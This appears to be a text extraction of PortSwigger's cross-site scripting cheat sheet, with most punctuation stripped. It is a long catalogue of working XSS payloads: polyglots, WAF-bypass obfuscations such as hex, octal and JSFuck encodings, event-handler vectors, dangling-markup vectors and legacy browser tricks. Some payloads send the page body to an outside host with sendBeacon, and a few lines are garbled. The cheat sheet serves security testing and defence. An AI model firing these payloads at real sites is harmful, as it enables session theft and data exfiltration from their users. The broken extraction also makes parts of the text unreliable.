ltiframe src=httpsubdomain1portswigger-labsnetdangling_markupnamehtml name=
Using object window name to pass data from thepage
ltobject data=httpsubdomain1portswigger-labsnetdangling_markupnamehtml name=
Using frame window name to pass data from thepage
ltframesetgtltframe src=httpsubdomain1portswigger-labsnetdangling_markupnamehtml name=
Overwrite type attribute with image in hidden inputs ltinput type=hidden type=image src=evil
Polyglots
Polyglot payload 1 javascript--gtlttitlegtltstylegtlttextareagtltscriptgtltxmpgtltsvgonload=++onmouseover=1+[[]+alert(1)gt
Polyglot payload 2 javascript`--gtltnoscriptgtlttitlegtlttextareagtltstylegtlttemplategtltnoembedgtltscriptgtlthtml onmouseover=ampltsvgonload=alert()gt
Polyglot payload 3 javascript--gtlttitlegtltstylegtlttextareagtltscriptgtltxmpgtltdetailsopenontoggle=+`++onmouseover=1+[[]+alert(PortSwiggerRes)gt
WAF bypass global objects
XSS into a JavaScript string string concatenation(window)
window[ale+rt](window[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(self)
self[ale+rt](self[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(this)
this[ale+rt](this[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(top)
top[ale+rt](top[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(parent)
parent[ale+rt](parent[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(frames)
frames[ale+rt](frames[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(globalThis)
globalThis[ale+rt](globalThis[doc+ument][dom+ain])
XSS into a JavaScript string comment syntax(window)
window[fooalertbar](window[foodocumentbar][domain])
XSS into a JavaScript string comment syntax (self) self[fooalertbar](self[foodocumentbar][domain])
XSS into a JavaScript string comment syntax (this) this[fooalertbar](this[foodocumentbar][domain])
XSS into a JavaScript string comment syntax (top) top[fooalertbar](top[foodocumentbar][domain])
XSS into a JavaScript string comment syntax(parent)
parent[fooalertbar](parent[foodocumentbar][domain])
XSS into a JavaScript string comment syntax(frames)
frames[fooalertbar](frames[foodocumentbar][domain])
XSS into a JavaScript string comment syntax(globalThis)
globalThis[fooalertbar](globalThis[foodocumentbar][domain])
XSS into a JavaScript string hex escape sequence(window)
window[x61x6cx65x72x74](window[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(self)
self[x61x6cx65x72x74](self[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(this)
this[x61x6cx65x72x74](this[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(top)
top[x61x6cx65x72x74](top[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(parent)
parent[x61x6cx65x72x74](parent[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(frames)
frames[x61x6cx65x72x74](frames[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(globalThis)
globalThis[x61x6cx65x72x74](globalThis[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequenceand base64 encoded string (window)
window[x65x76x61x6c](window[x61x6cx65x72x74](window[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (self)
self[x65x76x61x6c](self[x61x6cx65x72x74](self[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (this)
this[x65x76x61x6c](this[x61x6cx65x72x74](this[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (top)
top[x65x76x61x6c](top[x61x6cx65x72x74](top[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (parent)
parent[x65x76x61x6c](parent[x61x6cx65x72x74](parent[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (frames)
frames[x65x76x61x6c](frames[x61x6cx65x72x74](frames[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequence globalThis[x65x76x61x6c](globalThis[x61x6cx65x72x74]
XSS into a JavaScript string hex escape sequence
and base64 encoded string (globalThis) (globalThis[x61x74x6fx62](WFNT)))
XSS into a JavaScript string octal escape sequence(window)
window[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(self)
self[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(this)
this[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(top)
top[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(parent)
parent[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(frames)
frames[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(globalThis)
globalThis[141154145162164](130123123)
XSS into a JavaScript string unicode escape(window)
window[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape (self) self[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape (this) this[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape (top) top[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape(parent)
parent[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape(frames)
frames[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape(globalThis)
globalThis[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string RegExp sourceproperty (window)
window[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (self)
self[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (this)
this[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (top)
top[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (parent)
parent[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (frames)
frames[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (globalThis)
globalThis[alsource+ertsource](XSSsource)
XSS into a JavaScript string HieroglyphyJSFuck(window)
window[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(self)
self[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(this)
this[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(top)
top[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(parent)
parent[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(frames)
frames[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(globalThis)
globalThis[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
Impossible labs
Classic vectors (XSS crypt)
Image src with JavaScript protocol ltimg src=javascriptalert(1)gt
Body background with JavaScript protocol ltbody background=javascriptalert(1)gt
Iframe data urls no longer work as modern browsersuse a null origin
ltiframe src=datatexthtmlltimg src=1 onerror=alert(documentdomain)gtgt
Title Description Lengthlimit
Closest vector Link
Basic context WAFblocks lt[a-zA-Z]
This lab captures the scenario when you cant use an open tag followed by an alphanumericcharacter Sometimes you can solve this problem by bypassing the WAF entirely but whatabout when thats not an option Certain versions of NET have this behaviour and its onlyknown to be exploitable in old IE with lttag
NA NA 128279
Script based injectionbut quotes forwardslash and backslash areescaped
We often encounter this situation in the wild you have an injection inside a JavaScript variableand can inject angle brackets but quotes and forwardbackslashes are escaped so you cantsimply close the script block
The closest weve got to solving this is when you have multiple injection points The first withina script based context and the second in HTML
NA NA 128279
innerHTML context butno equals allowed
You have a site that processes the query string and URL decodes the parameters but splits onthe equals then assigns to innerHTML In this context ltscriptgt doesnt work and we cant use =to create an event
NA NA 128279
Basic context lengthlimit
This labs injection occurs within the basic HTML context but has a length limitation of 15Filedescriptor came up with a vector that could execute JavaScript in 16 characters ltqoncut=alert`` but can you beat it
15 ltq oncut=alert`` 128279
Attribute context lengthlimit
The context of this lab inside an attribute with a length limitation of 14 characters We came upwith a vector that executes JavaScript in 15 charactersoncut=alert``+ the plus is a trailingspace Do you think you can beat it
14 oncut=alert`` 128279
Basic context lengthlimit arbitrary code
Its all well and good executing JavaScript but if all you can do is call alert what use is that Inthis lab we demonstrate the shortest possible way to execute arbitrary code
19 ltqoncut=eval(name)
128279
Attribute context lengthlimit arbitrary code
Again calling alert proves you can call a function but we created another lab to find theshortest possible attribute based injection with arbitrary JavaScript
17 See link 128279
Injection occurs inside aframeset but before thebody
We received a request from twitter about this next lab It occurs within a frameset but before abody tag with equals filtered You would think you could inject a closing frameset followed by ascript block but that would be too easy
NA NA 128279
Injection occurs insidesingle quoted stringonly characters a-z0-9+` are allowed
The injection occurs within a single quoted string and the challenge is to execute arbitrarycode using the charset a-zA-Z0-9+`
NA NA 128279
VBScript protocol used to work in IE lta href=vbscriptMsgBox+1gtXSSltagt lta href= onclick=vbsMsgbox+1gtXSSltagt lta href= onclick=VBSMsgbox+1gtXSSltagt lta href= onclick=vbscriptMsgbox+1gtXSSltagt lta href= onclick=VBSCRIPTMsgbox+1gtXSSltagt lta href= language=vbs onclick=vbscriptMsgbox+1gtXSSltagt
JScript compact was a minimal version of JS thatwasnt widely used in IE
lta href= onclick=jscriptcompactalert(1)gttestltagt lta href= onclick=JSCRIPTCOMPACTalert(1)gttestltagt
JScriptEncode allows encoded JavaScript lta href= language=JScriptEncode onclick=~^CAAAAA==C^+D`8mgIAAA==^~gtXSSltagt lta href= onclick=JScriptEncode~^CAAAAA==C^+D`8mgIAAA==^~gtXSSltagt
VBScriptEncoded allows encoded VBScript ltiframe onload=VBScriptEncode~^CAAAAA==ko$K6FoQIAAA==^~gt ltiframe language=VBScriptEncode onload=~^CAAAAA==ko$K6FoQIAAA==^~gt
JavaScript entities used to work in NetscapeNavigator
lta title=ampalert(1)gtXSSltagt
JavaScript stylesheets used to be supported byNetscape Navigator
ltlink href=xssjs rel=stylesheet type=textjavascriptgt
Button used to consume markup ltformgtltbutton name=x formaction=xgtltbgtstealme
IE9 select elements and plaintext used to consumemarkup
ltform action=xgtltbuttongtXSSltbuttongtltselect name=xgtltoptiongtltplaintextgtltscriptgttoken=supersecretltscriptgt
XBL Firefox only lt= 2 ltdiv style=-moz-bindingurl(businessinfocouklabsxblxblxmlxss)gt ltdiv style=-moz-bindingurl(businessinfocouklabsxblxblxmlxss)gt ltdiv style=-moz-bindin67url(businessinfocouklab sxblxblxmlxss)gt ltdiv style=-moz-bindinampx5c67url(businessinfocouklab sxblxblxmlxss)gt
XBL also worked in FF35 using data urls ltimg src=blah style=-moz-binding url(datatextxmlcharset=utf-83C3Fxml20version3D2210223F3E3Cbindings20xmlns3D22 http3Awwwmozillaorgxbl223E3Cbinding20id3D22loader223E3Cimplementation3E3Cconstructor3E3C215BCDATA5Bvar20url203D2022alertjs 223B20var20scr203D20documentcreateElement2822script22293B20scrsetAttribute2822src222Curl293B20var20bodyElement203D20 documentgetElementsByTagName2822html2229item280293B20bodyElementappendChild28scr293B205D5D3E3Cconstructor3E3Cimplementation3E3C binding3E3Cbindings3E) gt
CSS expressions lt=IE7 ltdiv style=xssexpression(alert(1))gt ltdiv style=xssexpression(1)-alert(1)gt ltdiv style=xssexpressio6e(alert(1))gt ltdiv style=xssexpressio006e(alert(1))gt ltdiv style=xssexpressio00006e(alert(1))gt ltdiv style=xssexpressio6e(alert(1))gt ltdiv style=xssexpressioampx5c6e(alert(1))gt
In quirks mode IE allowed you to use = instead of ltdiv style=xss=expression(alert(1))gt ltdiv style=colorampx3dredgttestltdivgt
Behaviors for older modes of IE lta style=behaviorurl(defaultAnchorClick) folder=javascriptalert(1)gtXSSltagt
Older versions of IE supported event handlers infunctions
ltscriptgt function windowonload() alert(1) ltscriptgt ltscriptgt function windowonload() alert(1) ltscriptgt ltscriptgt function windowlocation() ltscriptgt ltbodygt ltscriptgt functionltimg src=1 onerror=alert(1)gtdocumentbodyinnerHTML() ltscriptgt ltbodygt ltbodygt
y
ltscriptgt function documentbodyinnerHTML() x = ltimg src=1 onerror=alert(1)gt ltscriptgt ltbodygt
GreyMagic HTML+time exploit (no longer workseven in 5 docmode)
ltHTMLgtltBODYgtltxmlnamespace prefix=t ns=urnschemas-microsoft-comtimegtltimport namespace=t implementation=defaulttime2gtlttset attributeName=innerHTML to=XSSltimg src=1 onerror=alert(1)gtgt ltBODYgtltHTMLgt
Firefox allows NULLS after amp lta href=javascriptampx6aavascriptalert(1)gtFirefoxltagt
Firefox allows NULLs inside named entities lta href=javascriptampcolonalert(1)gtFirefoxltagt
Firefox allows NULL characters inside openingcomments
lt-- gtltimg title=--gtltiframeonload=alert(1)gtgt --gt lt-- gtltimg title=--gtltiframeonload=alert(1)gtgt --gt
Safari used to allow any tag to have a onload eventinside SVG
ltsvggtltxss onload=alert(1)gt
Isindex using src attribute ltisindex type=image src=evil
Isindex using submit ltisindex type=submit style=width100height100 value=XSS formaction=evil
Isindex and formaction ltisindex type=submit formaction=javascriptalert(1)gt
Isindex and action ltisindex type=submit action=javascriptalert(1)gt
CreditsBrought to you by PortSwigger lovingly constructed by Gareth Heyes
This cheat sheet wouldnt be possible without the web security community who share their research Big thanks to James Kettle Mario Heiderich EduardoVela Masato Kinugawa Filedescriptor LeverOne Ben Hayak Alex Infuumlhr Mathias Karlsson Jan Horn Ian Hickey Gaacutebor Molnaacuter tsetnep Psych0tr1aSkyphire Abdulrhman Alqabandi brainpillow Kyo Yosuke Hasegawa White Jordan Algol jackmasa wpulog Bolk Robert Hansen David LindsaySuperhei Michal Zalewski Renaud Lifchitz Roman Ivanov Frederik Braun Krzysztof Kotowicz Giorgio Maone GreyMagic Marcus Niemietz SoroushDalili Stefano Di Paola Roman Shafigullin Lewis Ardern Michał Bentkowski SOslashᴘᴀS avanish46 Juuso Kaumlenmaumlki jinmo123 itszn13 Martin Bajanik DavidGranqvist Andrea (theMiddle) Menin simps0n hahwul Paweł Hałdrzyński Jun Kokatsu RenwaX23 sratarun har1sec Yann C gadhiyasavan p4fgdiofeher
You can contribute to this cheat sheet by creating a new issue or updating the JSON and creating a pull request
onscroll
Fires when the page scrolls ltbody onscroll=alert(1)gtltdiv style=height1000pxgtltdivgtltdiv id=xgtltdivgtCompatibility
onstart
Fires when the marquee starts ltmarquee onstart=alert(1)gtXSSltmarqueegtCompatibility
ontimeupdate
Fires when the timeline is changed ltaudio controls autoplay ontimeupdate=alert(1)gtltsource src=validaudiowav type=audiowavgtltaudiogt
Compatibility
ontoggle
Fires when the details tag is expanded ltdetails ontoggle=alert(1) opengttestltdetailsgtCompatibility
ontransitioncancel
Fires when a CSS transition cancels ltstylegttarget color redltstylegtltxss id=x style=transitioncolor 10s ontransitioncancel=alert(1)gtltxssgt
Compatibility
ontransitionend
Fires when a CSS transition ends ltstylegttarget colorredltstylegtltxss id=x style=transitioncolor 1s ontransitionend=alert(1)gtltxssgt
Compatibility
ontransitionrun
Fires when a CSS transition begins ltstylegttarget transform rotate(180deg)ltstylegtltxss id=x style=transitiontransform 2s ontransitionrun=alert(1)gtltxssgt
Compatibility
ontransitionstart
Fires when a CSS transition starts ltstylegttarget colorredltstylegtltxss id=x style=transitioncolor 1s ontransitionstart=alert(1)gtltxssgt
Compatibility
onunhandledrejection
Fires when a promise isnt handled ltbody onunhandledrejection=alert(1)gtltscriptgtfetch(xyz)ltscriptgtCompatibility
onunload
Fires when the page is unloaded ltbody onunload=navigatorsendBeacon(httpssslportswigger-labsnetdocumentbodyinnerHTML)gt
Compatibility
onwaiting
Fires when while waiting for the data ltvideo autoplay controls onwaiting=alert(1)gtltsource src=validvideomp4 type=videomp4gtltvideogt
Compatibility
onwebkitanimationend
Fires when a CSS animation ends ltstylegtkeyframes xltstylegtltxss style=animation-namex onwebkitanimationend=alert(1)gtltxssgt
Compatibility
onwebkitanimationiteration
Fires when a CSS animation repeats ltstylegtkeyframes slidein ltstylegtltxss style=animation-duration1sanimation-nameslideinanimation-iteration-count2 onwebkitanimationiteration=alert(1)gtltxssgt
Compatibility
onwebkitanimationstart
Fires when a CSS animation starts ltstylegtkeyframes xltstylegtltxss style=animation-namex onwebkitanimationstart=alert(1)gtltxssgt
Compatibility
onwebkittransitionend
Fires when a CSS transition ends ltstylegttarget colorredltstylegtltxss id=x style=transitioncolor 1s onwebkittransitionend=alert(1)gtltxssgt
Compatibility
Event handlers that do require user interaction
Event Description Code
onauxclick
Fires when right clicking or using themiddle button of the mouse
ltinput onauxclick=alert(1)gtCompatibility
onbeforecopy
Requires you copy a piece of text lta onbeforecopy=alert(1) contenteditablegttestltagtCompatibility
onbeforecut
Requires you cut a piece of text lta onbeforecut=alert(1) contenteditablegttestltagtCompatibility
onbeforepaste
Requires you paste a piece of text lta onbeforepaste=alert(1) contenteditablegttestltagtCompatibility
onchange
Requires as change of value ltinput onchange=alert(1) value=xssgtCompatibility
onclick
Requires a click of the element ltxss onclick=alert(1)gttestltxssgtCompatibility
onclose
Fires when a dialog is closed ltdialog open onclose=alert(1)gtltform method=dialoggtltbuttongtXSSltbuttongtltformgt
Compatibility
oncontextmenu
Triggered when right clicking to show thecontext menu
ltxss oncontextmenu=alert(1)gttestltxssgtCompatibility
oncopy
Requires you copy a piece of text ltxss oncopy=alert(1) value=XSS autofocus tabindex=1gttestCompatibility
oncut
Requires you cut a piece of text ltxss oncut=alert(1) value=XSS autofocus tabindex=1gttestCompatibility
ondblclick
Triggered when double clicking theelement
ltxss ondblclick=alert(1) autofocus tabindex=1gttestltxssgtCompatibility
ondrag
Triggered dragging the element ltxss draggable=true ondrag=alert(1)gttestltxssgtCompatibility
ondragend
Triggered dragging is finished on theelement
ltxss draggable=true ondragend=alert(1)gttestltxssgtCompatibility
ondragenter
Requires a mouse drag ltxss draggable=true ondragenter=alert(1)gttestltxssgtCompatibility
ondragleave
Requires a mouse drag ltxss draggable=true ondragleave=alert(1)gttestltxssgtCompatibility
ondragover
Triggered dragging over an element ltdiv draggable=true contenteditablegtdrag meltdivgtltxss ondragover=alert(1) contenteditablegtdrop hereltxssgt
Compatibility
ondragstart
Requires a mouse drag ltxss draggable=true ondragstart=alert(1)gttestltxssgtCompatibility
ondrop
Triggered dropping a draggable element ltdiv draggable=true contenteditablegtdrag meltdivgtltxss ondrop=alert(1) contenteditablegtdrop hereltxssgt
Compatibility
onfullscreenchange
Fires when a video changes full screenstatus
ltvideo onfullscreenchange=alert(1) src=validvideomp4 controlsgtCompatibility
oninput
Requires as change of value ltinput oninput=alert(1) value=xssgtCompatibility
oninvalid
Requires a form submission with anelement that does not satisfy itsconstraints such as a required attribute
ltformgtltinput oninvalid=alert(1) requiredgtltinput type=submitgtCompatibility
onkeydown
Triggered when a key is pressed ltxss onkeydown=alert(1) contenteditablegttestltxssgtCompatibility
onkeypress
Triggered when a key is pressed ltxss onkeypress=alert(1) contenteditablegttestltxssgtCompatibility
onkeyup
Triggered when a key is released ltxss onkeyup=alert(1) contenteditablegttestltxssgtCompatibility
onmousedown
Triggered when the mouse is pressed ltxss onmousedown=alert(1)gttestltxssgtCompatibility
onmouseenter
Triggered when the mouse is hoveredover the element
ltxss onmouseenter=alert(1)gttestltxssgtCompatibility
onmouseleave
Triggered when the mouse is movedaway from the element
ltxss onmouseleave=alert(1)gttestltxssgtCompatibility
onmousemove
Requires mouse movement ltxss onmousemove=alert(1)gttestltxssgtCompatibility
onmouseout
Triggered when the mouse is movedaway from the element
ltxss onmouseout=alert(1)gttestltxssgtCompatibility
onmouseover
Requires a hover over the element ltxss onmouseover=alert(1)gttestltxssgtCompatibility
onmouseup
Triggered when the mouse button isreleased
ltxss onmouseup=alert(1)gttestltxssgtCompatibility
onmousewheel
Fires when the mousewheel scrolls ltxss onmousewheel=alert(1)gtrequires scrollingCompatibility
onmozfullscreenchange
Fires when a video changes full screenstatus
ltvideo onmozfullscreenchange=alert(1) src=validvideomp4 controlsgtCompatibility
onpagehide
Fires when the page is changed ltbody onpagehide=navigatorsendBeacon(httpssslportswigger-labsnetdocumentbodyinnerHTML)gt
Compatibility
onpaste
Requires you paste a piece of text lta onpaste=alert(1) contenteditablegttestltagtCompatibility
onpause
Requires clicking the element to pause ltaudio autoplay controls onpause=alert(1)gtltsource src=validaudiowav type=audiowavgtltaudiogt
Compatibility
onpointerdown
Fires when the mouse down ltxss onpointerdown=alert(1)gtXSSltxssgtCompatibility
onpointerenter
Fires when the mouseenter ltxss onpointerenter=alert(1)gtXSSltxssgtCompatibility
onpointerleave
Fires when the mouseleave ltxss onpointerleave=alert(1)gtXSSltxssgtCompatibility
onpointermove
Fires when the mouse move ltxss onpointermove=alert(1)gtXSSltxssgtCompatibility
onpointerout
Fires when the mouse out ltxss onpointerout=alert(1)gtXSSltxssgtCompatibility
onpointerover
Fires when the mouseover ltxss onpointerover=alert(1)gtXSSltxssgtCompatibility
onpointerrawupdate
Fires when the pointer changes ltxss onpointerrawupdate=alert(1)gtXSSltxssgtCompatibility
onpointerup
Fires when the mouse up ltxss onpointerup=alert(1)gtXSSltxssgtCompatibility
onreset
Requires a click ltform onreset=alert(1)gtltinput type=resetgtCompatibility
onsearch
Fires when a form is submitted and theinput has a type attribute of search
ltformgtltinput type=search onsearch=alert(1) value=Hit return autofocusgtCompatibility
onseeked
Requires clicking the element timeline ltaudio autoplay controls onseeked=alert(1)gtltsource src=validaudiowav type=audiowavgtltaudiogt
Compatibility
onseeking
Requires clicking the element timeline ltaudio autoplay controls onseeking=alert(1)gtltsource src=validaudiowav type=audiowavgtltaudiogt
Compatibility
onselect
Requires you select text ltinput onselect=alert(1) value=XSS autofocusgtCompatibility
onselectionchange
Fires when text selection is changed onthe page
ltbody onselectionchange=alert(1)gtselect some textCompatibility
onselectstart
Fires when beginning a text selection ltbody onselectstart=alert(1)gtselect some textCompatibility
onshow
Fires context menu is shown ltdiv contextmenu=xssgtltpgtRight clickltmenu type=context id=xss onshow=alert(1)gtltmenugtltdivgt
Compatibility
onsubmit
Requires a form submission ltform onsubmit=alert(1)gtltinput type=submitgtCompatibility
ontouchend
Fires when the touch screen only mobiledevice
ltbody ontouchend=alert(1)gt Compatibility
ontouchmove
Fires when the touch screen and moveonly mobile device
ltbody ontouchmove=alert(1)gt Compatibility
ontouchstart
Fires when the touch screen only mobiledevice
ltbody ontouchstart=alert(1)gt Compatibility
onvolumechange
Requires volume adjustment ltaudio autoplay controls onvolumechange=alert(1)gtltsource src=validaudiowav type=audiowavgtltaudiogt
Compatibility
onwheel
Fires when you use the mouse wheel ltbody onwheel=alert(1)gtCompatibility
Restricted characters
No parentheses using exception handling ltscriptgtonerror=alertthrow 1ltscriptgt
No parentheses using exception handling no semicolons
ltscriptgtonerror=alertthrow 1ltscriptgt
No parentheses using exception handling no semicolons using expressions
ltscriptgtthrow onerror=alert1ltscriptgt
No parentheses using exception handling and eval ltscriptgtthrow onerror=eval=alertx281x29ltscriptgt
No parentheses using exception handling and evalon Firefox
ltscriptgtonerror=evalthrowlineNumber1columnNumber1fileName1messagealertx281x29ltscriptgt
No parentheses using ES6 hasInstance andinstanceof with eval
ltscriptgtalertx281x29instanceof[SymbolhasInstance]evalltscriptgt
No parentheses using ES6 hasInstance andinstanceof with eval without
ltscriptgtalertx281x29instanceof[Symbol[hasInstance]]evalltscriptgt
No parentheses using location redirect ltscriptgtlocation=javascriptalertx281x29ltscriptgt
No parentheses using location redirect no strings ltscriptgtlocation=nameltscriptgt
No parentheses using template strings ltscriptgtalert`1`ltscriptgt
No parentheses using template strings and locationhash
ltscriptgtnew Function`X$documentlocationhashsubstr`1``ltscriptgt
No parentheses or spaces using template stringsand location hash
ltscriptgtFunction`X$documentlocationhashsubstr`1````ltscriptgt
Frameworks
Bootstrap onanimationstart event ltxss class=progress-bar-animated onanimationstart=alert(1)gt
Bootstrap ontransitionend event ltxss class=carousel slide data-ride=carousel data-interval=100 ontransitionend=alert(1)gtltxss class=carousel-innergtltxss class=carousel-item activegtltxssgtltxss class=carousel-itemgtltxssgtltxssgtltxssgt
Protocols
Iframe src attribute JavaScript protocol ltiframe src=javascriptalert(1)gt
Object data attribute with JavaScript protocol ltobject data=javascriptalert(1)gt
Embed src attribute with JavaScript protocol ltembed src=javascriptalert(1)gt
A standard JavaScript protocol lta href=javascriptalert(1)gtXSSltagt
The protocol is not case sensitive lta href=JaVaScriptalert(1)gtXSSltagt
Characters x01-x20 are allowed before the protocol lta href= javascriptalert(1)gtXSSltagt
Characters x09x0ax0d are allowed inside theprotocol
lta href=javas criptalert(1)gtXSSltagt
Characters x09x0ax0d are allowed after protocolname before the colon
lta href=javascript alert(1)gtXSSltagt
Xlink namespace inside SVG with JavaScriptprotocol
ltsvggtlta xlinkhref=javascriptalert(1)gtlttext x=20 y=20gtXSSlttextgtltagt
SVG animate tag using values ltsvggtltanimate xlinkhref=xss attributeName=href values=javascriptalert(1) gtlta id=xssgtlttext x=20 y=20gtXSSlttextgtltagt
SVG animate tag using to ltsvggtltanimate xlinkhref=xss attributeName=href from=javascriptalert(1) to=1 gtlta id=xssgtlttext x=20 y=20gtXSSlttextgtltagt
to 1 a id xss text x 20 y 20 XSS text a
SVG set tag ltsvggtltset xlinkhref=xss attributeName=href from= to=javascriptalert(1) gtlta id=xssgtlttext x=20 y=20gtXSSlttextgtltagt
Data protocol inside script src ltscript src=datatextjavascriptalert(1)gtltscriptgt
SVG script href attribute without closing script tag ltsvggtltscript href=datatextjavascriptalert(1) gt
SVG use element ChromeFirefox ltsvggtltuse href=dataimagesvg+xmlltsvg id=x xmlns=httpwwww3org2000svg xmlnsxlink=httpwwww3org1999xlink width=100 height=100gtlta xlinkhref=javascriptalert(1)gtltrect x=0 y=0 width=100 height=100 gtltagtltsvggtxgtltusegtltsvggt
Import statement with data URL ltscriptgtimport(datatextjavascriptalert(1))ltscriptgt
Base tag with JavaScript protocol rewriting relativeURLS
ltbase href=javascripta-alert(1)gtlta href=lolsafarihtmlgttestltagt
MathML makes any tag clickable ltmathgtltx href=javascriptalert(1)gtblah
Button and formaction ltformgtltbutton formaction=javascriptalert(1)gtXSS
Input and formaction ltformgtltinput type=submit formaction=javascriptalert(1) value=XSSgt
Form and action ltform action=javascriptalert(1)gtltinput type=submit value=XSSgt
Use element with an external URL ltsvggtltuse href=subdomain1portswigger-labsnetuse_elementuploadphpx gtltsvggt
Animate tag with keytimes and multiple values ltsvggtltanimate xlinkhref=xss attributeName=href dur=5s repeatCount=indefinite keytimes=001 values=httpsportswiggernetampsemijavascriptalert(1)ampsemi0 gtlta id=xssgtlttext x=20 y=20gtXSSlttextgtltagt
Other useful attributes
Using srcdoc attribute ltiframe srcdoc=ltimg src=1 onerror=alert(1)gtgtltiframegt
Using srcdoc with entities ltiframe srcdoc=ampltimg src=1 onerror=alert(1)ampgtgtltiframegt
Click a submit element from anywhere on the pageeven outside the form
ltform action=javascriptalert(1)gtltinput type=submit id=xgtltformgtltlabel for=xgtXSSltlabelgt
Hidden inputs Access key attributes can enableXSS on normally unexploitable elements
ltinput type=hidden accesskey=X onclick=alert(1)gt (Press ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X)
Link elements Access key attributes can enableXSS on normally unexploitable elements
ltlink rel=canonical accesskey=X onclick=alert(1) gt (Press ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X)
Download attribute can save a copy of the currentwebpage
lta href= download=filenamehtmlgtTestltagt
Disable referrer using referrerpolicy ltimg referrerpolicy=no-referrer src=portswigger-labsnetgt
Set windowname via parameter on the windowopenfunction
lta href= onclick=windowopen(httpsubdomain1portswigger-labsnetxssxssphpcontext=js_string_singleampx=27eval(name)alert(1))gtXSSltagt
Set windowname via name attribute in a ltiframegt ltiframe name=alert(1) src=httpsportswigger-labsnetxssxssphp
Set do a e a a e att bute a a e
tagcontext=js_string_singleampx=27eval(name)gtltiframegt
Set windowname via target attribute in a ltbasegt tag ltbase target=alert(1)gtlta href=httpsubdomain1portswigger-labsnetxssxssphpcontext=js_string_singleampx=27eval(name)gtXSS via target in base tagltagt
Set windowname via target attribute in a ltagt tag lta target=alert(1) href=httpsubdomain1portswigger-labsnetxssxssphpcontext=js_string_singleampx=27eval(name)gtXSS via target in a tagltagt
Set windowname via usemap attribute in a ltimggttag
ltimg src=validimagepng width=10 height=10 usemap=xssgtltmap name=xssgtltarea shape=rect coords=0082126 target=alert(1) href=httpsubdomain1portswigger-labsnetxssxssphpcontext=js_string_singleampx=27eval(name)gtltmapgt
Set windowname via target attribute in a ltformgt tag ltform action=httpsubdomain1portswigger-labsnetxssxssphp target=alert(1)gtltinput type=hidden name=x value=eval(name)gtltinput type=hidden name=context value=js_string_singlegtltinput type=submit value=XSS via target in a formgtltformgt
Set windowname via formtarget attribute in altinputgt tag type submit
